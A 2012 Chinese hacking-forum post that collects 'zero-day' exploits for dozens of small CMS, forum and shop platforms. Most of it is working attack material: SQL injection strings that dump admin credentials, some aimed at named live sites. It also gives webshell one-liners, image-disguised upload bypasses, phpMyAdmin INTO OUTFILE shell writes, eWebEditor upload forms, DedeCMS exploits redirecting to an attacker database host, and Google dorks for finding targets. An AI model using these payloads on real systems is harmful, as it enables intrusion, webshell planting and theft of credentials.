找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3429|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本. d9 x( ?; v# @# A

& t) l# Q, G5 _( j5 i/ g; e直接上exploit:8 z- k' n" ^$ Y& h
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
! ~9 a" d/ v+ v/ T1 Z* ^% `% e! x- jtest:http://www.tb11.net/system/xitong/shownews.asp?id=210" Y& g9 f, h8 F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' y9 i5 `& C, c4 G- H* yAsprain论坛 注册用户 上传图片就可拿到webshell
8 N* @: p/ a  T0 X; N, |" s2 Y
! H: ]7 p4 k- t( J6 \Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。" ~; a' b8 w, k8 ~6 [
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
; _3 k3 I& W+ y, V2.gif 为一小图片文件,一定要小,比如qq表情图片: a% i! B' D/ c3 G; C  e
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用8 b4 X' P. L' r
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
, e) {" r: C. X! J5 Q5.q.asp;.gif# Y" j- e" e# @' c! Z
google:Powered by Asprain* X! q$ s; P: o0 s6 y8 o* t% A% M  s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( G( T' v! }% G  y3 I3 ^) x0 ^

% J' L. y* `* \' F9 ^7 QShopNum1全部系统存在上传漏洞。6 o/ Y0 V+ |3 I

3 \+ [. }- E7 n; u5 }首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
& j: G! t( x  v# W" N按说明 提示登录后台。。
# U# t$ ~: r3 ^# A& ^在后台功能页面->附件管理->附件列表  o8 N% M' f! L+ O
可以直接上传.aspx 后缀木马2 P9 }( Q9 y2 Z
http://demo.shopnum1.com/upload/20110720083822500.aspx  y) j- x7 \3 M% d! p0 d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# D; _' Y/ A3 I2 e8 @3 o) V5 i. |+ s/ _2 p$ t- m0 {8 Y- @
牛牛CMS中小企业网站管理系统 上传漏洞
+ w$ S% R6 e& z& h% D" X( u: j' J' s3 N
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。0 J2 b- M/ R- l/ ^2 b; b4 A  O; D. X
后台:admin/login.asp
3 G( C! L( ], r4 L$ newebeditor 5.5 Nday) R7 m, ^/ u- T3 D
exp:- G: H! [, [" G) o6 I( E
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?: a  k* e' {! i) V7 |/ Z2 ~& S( q: U
<input?type=file?name=uploadfile?size=100><br><br>?( B4 X+ n" Z- x- O( e2 b
<input?type=submit?value=upload>?
* b; \3 N0 Z: Y- k+ j& N4 I8 d1 m</form>  f: S. S  |8 k0 U: K. A: u- I
ps:先上传小马.' I4 [3 C$ C5 O. S; c, x  l
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
4 P: {, ~  C$ d. p/ Y! r% N! h" g! x6 j0 Y: }# j* @
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 L! i! k) y' @+ ^( J; y1 @

0 k9 ]* O' d4 E9 j7 i& hYothCMS 遍历目录漏洞
$ I$ W- Z: o3 X2 @  j$ A& q/ ~) ~" m
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
+ k1 y* u, l  |4 M# w$ b4 F: b默认后台:admin/login.asp
' V7 U$ f& i; F遍历目录:
4 N/ m) Z0 s$ p$ ^9 I2 E9 A$ t8 Gewebeditor/manage/upload.asp?id=1&dir=../
6 B9 p/ w* C$ V4 H) B. Kdata:
: o. w+ s( m) ~2 ^! Hhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa# h( G8 c) K, r9 p. e- h
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 F% p- I% a+ A/ y% A# E
8 a6 ?6 i2 L# @5 G8 \8 ]' a
Net112企业建站系统 1.0+ v: |+ ]/ f% c- J
9 ?) }/ H0 G2 t2 d1 [, Q
源码简介:/ M( `5 q, u% l) ^8 L: U/ `
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
" U1 k( y' j. n8 n* L3 `7 y添加管理员:. b  s$ Q1 C( l: P
http://www.0855.tv/admin/admin.asp?action=add&level=2
* O, ]9 A0 h% t7 N其实加不加都不是很重要,后台文件都没怎么作验证。! g$ i) U) w4 m: M1 ~' K8 L2 F
上传路径:
5 D/ K/ U! T: s1 Z4 b* K# O' l3 bhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200% d9 L2 {8 q/ U
http://www.0855.tv/inc/Upfile.asp?Stype=2
! @- G: `6 l1 b; N2 H怎么利用自己研究。5 a  ~5 t* S8 q. G- ~2 g# _
遍历目录:9 p: |+ R$ A% |0 J& s; |
http://www.0855.tv/admin/upfile.asp?path=../..
. z0 q! y8 I& `8 K( ?. [/ o如:! ]; u2 I5 Q+ \9 l! R! A
http://www.0855.tv/admin/upfile.asp?path=../admin% a7 @2 s' a, g* H! l
http://www.0855.tv/admin/upfile.asp?path=../data$ ?7 H- S9 `  q% [) h. q( _
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 ?" J* G( D( Y- O# X7 c
; A, [% e& @  r. V2 I. r  ?  G
易和阳光购物商城通杀 上传漏洞
# @( M% x. G0 B2 w; p. w
2 l) d) q3 _' ~/ n+ m前提要求是IIS6.0+asp坏境。/ |( W% j2 g0 C& n
漏洞文件Iheeo_upfile.asp
# ^7 U$ E+ q; d* E, b6 _* e; w" ~过滤不严.直接可以iis6.0上传
- Z0 D. c$ g8 `# L4 M把ASP木马改成0855.asp;1.gif- q% \- d7 @: R/ [# d8 M
直接放到明小子上传# V# S/ |4 ^! {
Google搜索:inurl:product.asp?Iheeoid=/ W2 h* [: h. ~9 R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( o' Q& y. f. a7 b: A- G* U! X: V

& C( u2 e1 ~1 a2 v) `+ K) P1 {phpmyadmin后台4种拿shell方法. w' [5 w+ S0 f3 {; v: Y

5 z7 u7 S- _& b3 V# m方法一:
4 \* m* h. e0 d) wCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
8 d8 J! z2 g$ g9 s! [INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');4 M9 p3 ?  u& C, z# q! y
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
( l9 q* V; u: I8 ~6 P- @2 ?3 @----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php3 `; _6 T1 G! G( L5 W; s  Z
一句话连接密码:xiaoma
$ s: P. C4 z/ Q2 T, T方法二:0 F% s! V; K6 p% `* e
Create TABLE xiaoma (xiaoma1 text NOT NULL);
- W" k0 X$ L$ M) e! Q* zInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
+ l3 S, w. C+ K9 F0 n( L6 pselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
, m) Q# u5 `  |/ [; x# s: [Drop TABLE IF EXISTS xiaoma;
5 K, ^6 |0 y. G: ~  F方法三:6 j, q8 K; j$ j
读取文件内容:    select load_file('E:/xamp/www/s.php');
) ]+ m- i8 R8 F, t9 E写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
7 S( c1 E8 w: k* i3 gcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'3 o# B3 c/ i3 p/ k, A- ^, y
方法四:
! ^5 v; U$ c; o  Y) Dselect load_file('E:/xamp/www/xiaoma.php');% w  R0 Z# W6 V2 u/ f
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'+ v3 h" v3 f" C$ b  N- C! k
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
, j2 m% Y1 f$ G9 f--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 T6 p# o) p- }; a8 Z# X7 t
$ m3 Z$ q6 L5 l+ P$ U/ w. W* N传信网络独立开发网站源码0day漏洞8 r! J, f$ ?: c  i9 ~+ U

! ~; U. p+ B/ a, i后台system/login.asp9 i. U) y; x: G' H
进了后台有个ewebeditor. u# G- U' P2 s! `9 H% r+ r6 o
Google 搜索inurl:product1.asp?tyc=
/ F0 P% o2 l: D0 D5 e' y编辑器漏洞默认后台ubbcode/admin_login.asp2 ]/ \  O4 Q: I. ]" d
数据库ubbcode/db/ewebeditor.mdb
# W5 U! F9 N: d默认账号密码yzm 111111
  J& B) R8 a$ L/ c" D2 X2 d: `5 P
6 h" k# R1 c* z! Y* V) g拿webshell方法
3 H  T( n% N1 s登陆后台点击“样式管理”-选择新增样式
; M  P3 C' M( U8 n4 Q# [样式名称:scriptkiddies 随便写
( ^1 g9 O" {: }+ U# B路径模式:选择绝对路径 : f0 K/ g+ F% B
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx( o0 \8 I0 O$ w. r2 O
图片类型比如就是我们要上传的ASP木马格式
" o7 ^  q" R5 ^) Q6 z( G" R上传路径:/
1 `0 O) X" C. G5 n4 a/ q; l图片限制:写上1000 免的上不了我们的asp木马
$ V0 J: |$ t5 D$ T上传内容不要写2 t9 m, G) Y2 k; X& K
可以提交了 + y7 W( ^* H; E# ?; L
样式增加成功!
- O0 E3 l5 K  v5 n, p: {* h返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 % m; A# b; B9 d5 y) @7 |
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置( r. n3 |0 E6 h) g
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies8 _4 \5 {: g8 J% d# [2 h
上ASP木马 回车 等到路径
) V! Y/ z) E* t- D* f- V' S3 Q- j6 ^0 o4 _
后台:system/login.asp
. q8 N( h! X# BExp:
' @/ p3 U$ F+ t# C2 i: C6 Band 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master! `* B; }! [6 T7 Q- \
测试:; }7 ]- m! S! E) ]6 o% a0 h7 l# o1 N3 Y
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
* j0 V: H, v; M) V+ nhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
3 A8 |2 M6 t% o# c--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ ]  B! D( h; M) }8 f; D

3 k, _5 N" @& d! `7 x4 Jfoosun 0day 最新注入漏洞0 H$ K- r2 m( w9 m" [, C
% P! \. t/ L% U, u5 R
漏洞文件:www.xxx.com/user/SetNextOptions.asp
: Q/ t9 f" Q) C. l, V$ K# U利用简单的方法:7 d$ H% Y, o* i. t  [
暴管理员帐号:4 @% @! _) M9 l
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
5 |: D7 w1 M: [) x$ f; E- X4 ]暴管理员密码:
# d4 S2 d2 C1 \8 G0 t- bhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,+ x% t% l& g( |1 q$ ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ N; K% k% c% ?. q% ~4 S1 m* L7 r
' g2 J5 o- |" L, w5 U" H
网站程序的版权未知!
- ]7 g0 t% {9 ]2 J0 h) r$ x7 @  G; T1 p2 m) x' W1 Z. }; K0 D* B
默认网站数据库:
+ e0 _& r& g& \5 E. y+ O6 Owww.i0day.com/data/nxnews.mdb* I4 `; d5 m. Y5 N2 |
ewebeditor 在线编辑器:1 r5 s4 I3 I" k$ s
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb  y2 D5 h' T, d( n1 G
登录地址:ewebeditor/admin_login.asp  I; N: K7 Q; |* F1 g
默认密码:admin  admin4 _5 I" v' B" g7 E' E0 T
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data0 s% ?9 g4 M9 }6 }
2 e& v- M( q: D- Y7 Q
Sql注入漏洞:
3 e+ @1 G% G& |! E3 Whttp://www.i0day.com/detail.asp?id=12, a) H8 H& O. @  u
exp:
' \3 \' i$ p: j8 Hunion select 1,admin,password,4,5,6,7,8 from admin; d8 N# n% U& v& ?# c5 S
爆出明文帐号/密码
% z- _$ @8 H2 E9 w
4 u# D) K4 \! B- Q# h0 L% b上传漏洞:
- [; n' f5 C( O+ M; K1 f后台+upfile.asp
  |# S1 i; S. _0 M如:
8 b2 R( y/ P. I5 fhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。4 {1 a  ?" T4 O+ L# |- S
shell的地址:网址+后台+成功上传的马9 f6 h7 B) h3 j- ^
google:inurl:news.asp?lanmuName=
5 m; i" B  Y& W( D, h------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: E; g3 j: o' J: n5 q0 f. C' ]; y2 v
dedecms最新0day利用不进后台直接拿WEBSHELL
6 Q/ X) H: a% U/ `' ~5 U) E* j
拿webshell的方法如下:. v# l+ H7 y# Q  H6 D
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.  J2 T" t# h) b% F5 l* G& I
前题条件,必须准备好自己的dede数据库,然后插入数据:
, {6 ]: J) d' Z. j* Zinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
, w2 \* c3 C7 g3 U$ H4 C
" x4 t/ R- X: d! Y# L再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。7 {& k# m3 V$ O& f( ^8 j$ j
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
# p( s1 Z. S" k# o) A<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
3 @4 ?9 n( H: z4 {% V9 m% o<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /># ~6 w0 U- r- F+ C, Z5 J
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />$ J% `- K4 q) k4 F
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />6 S! b! `' J- i. f1 y, |" C) C4 k
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
9 C$ d3 ^1 e; n- f/ {4 a; l$ [: U' ~<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
+ j# s% ^5 K7 o! ~<input type="text" value="true" name="nocache" style="width:400">( d1 |5 ~% }/ W8 g! L) ^9 v0 k# M
<input type="submit" value="提交" name="QuickSearchBtn"><br />* J* u* M, X) v. ?( v7 r
</form>5 n& Y- x; h. ]% U1 ~; z2 S; h
<script>
, I' |3 V. c' Tfunction addaction()
' f, [- w( s9 `! A3 P9 a5 m+ S/ K{
8 v8 l- u) E7 x/ Y: mdocument.QuickSearch.action=document.QuickSearch.doaction.value;3 G4 V6 q! m  d
}
2 Y6 ~6 P$ F: y</script>
0 O2 ?6 a% F: U' x/ B-----------------------------------------------------------------------------------------------------------------------------------------------1 e: B% u, Z8 w" x0 U$ |
$ v# w, y! C) J/ s9 q/ X' T
dedecms织梦暴最新严重0day漏洞( @  z- N$ `2 X  z) o2 i4 L! L
bug被利用步骤如下:
! ~5 n; @6 E/ S; }. R1 f" Khttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root* C. i. V+ ^5 [
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
/ q& o: }2 r- U2 Y5 I7 r  K# U-------------------------------------------------------------------------------------------------------------------------------------------
. S% }6 b7 S& B  {) g; ?0 D" a: V' c% N7 v& L" P+ X! o/ S
多多淘宝客程序上传漏洞 4 n; r2 Z0 S. h2 i
漏洞页面:0 u: R6 M4 a  v+ h' V9 E, p
admin\upload_pic.php
9 a  p% A( F) f传送门:) P) t6 [  z8 E; j- c
http://www.www.com/admin/upload_pic.php?uploadtext=slide1' G. E: L# z' I; z8 G9 F
PS:copy张图片马 直接  xxx.php 上传抓包地址!
# b% D8 W* o6 P2 A9 B* ?------------------------------------------------------------------------------------------------------------------------------------------------------( `$ O! B2 E& `$ B

) q: r, B/ }# [( O无忧公司系统ASP专业版后台上传漏洞/ u  ~0 S) A. K
漏洞文件 后台上传
: J6 D% a; {  U) u4 @  ~* S# M% Xadmin/uploadPic.asp
' n$ A7 u6 ^: ^( [" V' ]7 J漏洞利用 这个漏洞好像是雷池的
( U8 E1 k0 Y! O0 ]http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=13 \+ ~  V* W' T! B; g* v
等到的webshell路径:4 K' n% c% o+ }6 j
/UploadFiles/scriptkiddies.asp;_2.gif- I) H) G6 i/ u. O0 L: X6 j- x& v
---------------------------------------------------------------------------------------------------------------------------------------------------
% Z) |4 \$ k! q
  ]" Y9 b5 O# s2 m. K! O住哪酒店分销联盟系统2010
) e/ p3 K9 w, y- t1 Y1 [( OSearch:  f0 N8 H6 D" s( f+ t% r; I3 |2 j/ L
inurl:index.php?m=hotelinfo5 {' n/ ^7 E! I* r8 ^* y
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
- C0 J3 P0 q6 y默认后台:index.php?m=admin/login2 i3 Z3 l* D/ I+ Y
--------------------------------------------------------------------------------------------------------------------------------------------------, `( P& ?7 N3 \9 }

4 M3 \; F/ p3 x! ]. D) l' {inurl:info_Print.asp?ArticleID=
+ v* E' O$ H- D5 [; b! R后台 ad_login.asp. K' `. z3 J4 i
爆管理员密码:% `' L* m' H; ?# B0 C
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
/ q* g9 L5 I' G/ d) s! H! }------------------------------------------------------------------------------------------------------------------------------------------------------------
! ~0 }; _+ b4 k! j# L
' Z, P4 J  C' g搜索框漏洞!
6 r# H# w+ ]% b%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
7 n% n1 H$ h& y1 V3 I: P" y: d  U: l--------------------------------------------------------------------------------------------------------------------------------------------------------7 a3 C: _- `! p3 F+ A! j! q

$ [  e; P1 ]- d: W7 {关键字:0 A$ J; b' x" I6 s! W
inurl:/reg_TemletSel.asp?step=2" w- N* a' f( C/ e2 `- H, t
或者
+ L4 x" p8 b) w9 ^电子商务自助建站--您理想的助手
: q% m5 Z9 s  o+ y( f-------------------------------------------------------------------------------------------------------------------------------------------------
* {% }" I- s7 H0 N& O; [; q3 m5 f, m# o/ x+ i
iGiveTest 2.1.0注入漏洞
# }( S' ?" E. n1 F/ @* ~7 e; DVersion: <= 2.1.0
2 A0 W5 \% L" q. x) T6 `1 u; h1 h# w# Homepage: http://iGiveTest.com/; H# x) J2 _( F. W# t
谷歌关键字: “Powered by iGiveTest”1 o6 j6 U2 i$ E' S0 y" L6 r
随便注册一个帐号。然后暴管理员帐号和密码+ e& G2 x! a# O' K
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (17 \) N; v0 h. H# l7 i9 t
------------------------------------------------------------------------------------------------------------------------------------------------$ `/ }6 [" k* G2 _3 I' R1 p, ~) Z

- p& B; f0 ]2 s+ t& r# KCKXP网上书店注入漏洞
: S& B* x6 S* B$ M% T" w4 {0 g0 [% E( Z工具加表:shop_admin 加字段:admin
- d0 f9 t( B- _3 u2 ]后台:admin/login.asp
" B" l" S4 U& B. F登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/* x; O' n1 k# c, u; W
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息/ w, b. p/ N) `, L8 i. z8 c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; G- ]: Z: [* S' k# B
  V9 ?! [8 p" G段富超个人网站系统留言本写马漏洞  L% q) Z" U5 O9 p' y# F7 u0 u
源码下载:http://www.mycodes.net/24/2149.htm7 z. Y5 w; x% h  f* U- k) }1 R
addgbook.asp 提交一句话。
  r+ g0 D2 t( ?& t连接: http://www.xxxx.tv/date/date3f.asp
! B, H( s% A* r7 p: {) ?google:为防批量,特略!
9 S$ c. J% F" o-------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ P6 x. V  \  S  C' X- Y9 g6 |2 B
, Y/ z' L  Q3 ]) r( h/ p$ ]
智有道专业旅游系统v1.0 注入及列目录漏洞
+ Y& M4 W; ?) x$ t% D% J默认后台路径:/admin/login.asp
/ K; D1 s9 N) H默认管理员:admin
3 w0 Z1 X3 r3 t$ H. U7 @! L默认密码:1234560 e/ f' D( U% y4 a, o$ `$ N
SQL EXP Tset:
) p- m7 b7 K8 I  Khttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
" r9 v& E, F& H8 @$ ]------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 ^# c) Z+ z& X8 p$ x& S# p# @* w
4 Y4 ~! p) ]' q2 x+ @0 q! Z) f, ^
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
$ \! f$ ^% g3 Y, `! aEXP:
3 ^. d. h5 ^: {* s$ H<title>eWebeditoR3.8 for php任意文件上EXP</title>
) E- D( B1 h% m$ s8 g$ N" i7 L, y7 a<form action="" method=post enctype="multip
/ J, I4 m# T8 V6 |8 K4 e6 F; W. kart/form-data"> 8 w0 g8 @' v' w) G, C4 m
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> ; e4 V2 l1 o* i) |0 L
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
& {8 e. m% s/ [! i, v& }! U* ]2 y<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> - P( g) u! U/ D  t5 J4 |
file:<input type=file name="uploadfile"><br>
# L3 c8 s* ^3 y4 j: F2 B& @<input type=button value=submit onclick=fsubmit()>
; O2 |3 C/ m: o8 H2 J</form><br> 8 \# y: k: ]) c2 g) R! n! h
<script> " d; H# }7 T% {" Z$ x! S. S
function fsubmit(){ 4 k/ E  l# d( f: |! z
form = document.forms[0];
, Q) G) l/ ~4 `8 T$ x  E& x2 A9 eform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 8 D3 B0 \  B% n$ r" c
alert(form.action); 2 r5 o) o1 c6 e/ F( D' P3 X4 B6 X3 r
form.submit();
/ c# L. `* D8 |}
2 G& x- D. e) w( m* b</script>
& t0 @. Z% w$ t1 f注意修改里面ewebeditor的名称还有路径。
# P1 \) |9 g8 O9 f, I---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( ?% j5 C/ P( |" ?: n0 g! v+ h
4 A% w$ h1 C" ]. n2 K% q提交’时提示ip被记录 防注入系统的利用2 {0 r2 U# W- n
网址:http://www.xxx.com/newslist.asp?id=122& u0 W6 L) M, x3 G  N; h+ V8 I3 x
提示“你的操作已被记录!”等信息。
1 `7 E6 b7 ~% }9 [5 j- _& P4 ^) c利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
1 j* [. {, r5 w% p-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  ^; [% R' a/ V- K7 x9 I7 M% T' Z! e- Z" d  `  V0 X
西部商务网站管理系统 批量拿shell-0day$ Y0 }4 _  R" a$ m  L" D! R
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
1 e( M+ r( n3 Y+ [1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛8 s: o$ H. A" C8 W
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合  K; f2 K. F7 v4 y2 A' {
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂( b: v8 }$ ?0 H3 `6 c5 S7 g
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------: F/ u+ Z* ?. B, x
3 f$ W4 ?5 N# a/ T, F$ E5 C4 s8 X5 ]
JspRun!6.0 论坛管理后台注入漏洞
5 p, }& s; k& g9 X# t$ s) }3 R# i
3 i: E- p/ e) P1 E) P7 _3 JSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
$ a8 S9 Z+ S6 \+ r5 H4 f4 s, aJspRun!6.0
( s* I3 U7 e2 S! t. {漏洞描述:
2 r+ u* ?. G5 R: AJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。1 `9 ~0 e" S" i2 @& _! k% d+ i
在处理后台提交的文件中ForumManageAction.java第1940行5 }- [& e  D3 |% h3 ?% U. u! u% U
String export = request.getParameter("export");//直接获取,没有安全过滤
/ a4 d3 Z/ ?7 W* fif(export!=null){
: i) I- r" U6 s9 a, ?$ y; ^& cList&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
( x/ f8 l/ y2 X* k- eif(styles==null||styles.size()==0){
* A8 R* H: x$ W8 S<*参考
( F# ?' x( y/ r6 z8 Bnuanfan@gmail.com
) d1 D4 R7 D: k. m! K+ R5 A*> SEBUG安全建议:2 t& Z2 U' v; v4 ]; z  I
www.jsprun.net, d- p% T. ^4 c3 ~8 D" J
(1)安全过滤变量export; R2 X/ q$ Q" p, u4 [  q, a9 y
(2)在查询语句中使用占位符
! u3 V3 {, q7 ^* C------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! }+ R2 `! s' p# O- z! H) @3 s: ~/ Q6 t, Q$ ^: \
乌邦图企业网站系统 cookies 注入4 U/ `7 j' J! \, c
# Z/ z; [4 k- Y. z! r/ N
程序完整登陆后台:/admin/login.asp: P, J! w: o: R
默认登陆帐号:admin 密码:admin888# F& A: a/ G6 |3 M
语句:(前面加个空格)
1 Q: T9 l7 A! M6 F* }' y5 f: land 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin  k6 A: q7 v: n! H
或者是16个字段:
/ B9 F8 ^' Y1 F7 z7 j, O5 t& M: pand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
# k! K! B# q9 _/ V7 c8 i$ I5 C爆不出来自己猜字段。
/ e7 H2 K, c/ _: y' p% C" z注入点:http://www.untnt.com/shownews.asp?=88/ R8 f5 n/ R4 M2 F1 m  W4 g
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp" {- t. d: f# d) @( g
关键字:& [$ {$ O: U( H! g6 O* P! }$ r
inurl:shownews?asp.id=
) t# R4 O- t* y. J: r5 Y2 M5 K" C-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, m9 }8 p8 {2 n* l7 y( G$ H# ~

0 T2 h& d$ p3 ?7 YCKXP网上书店注入漏洞
7 d( g+ l1 F  `! R5 b( J
) l) H# x7 s: k5 `+ B3 M工具加表:shop_admin 加字段:admin
: H. Y# o1 u  ^$ `' q2 B后台:admin/login.asp 1 B! e" x1 z2 b: g- W
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/- u" i8 L- d" z! d( z
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息8 {" k: [7 J: v, ?5 E* T
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------( ]) X- g) i- J/ L) J) a0 N4 P
2 `# Y: \& w8 H
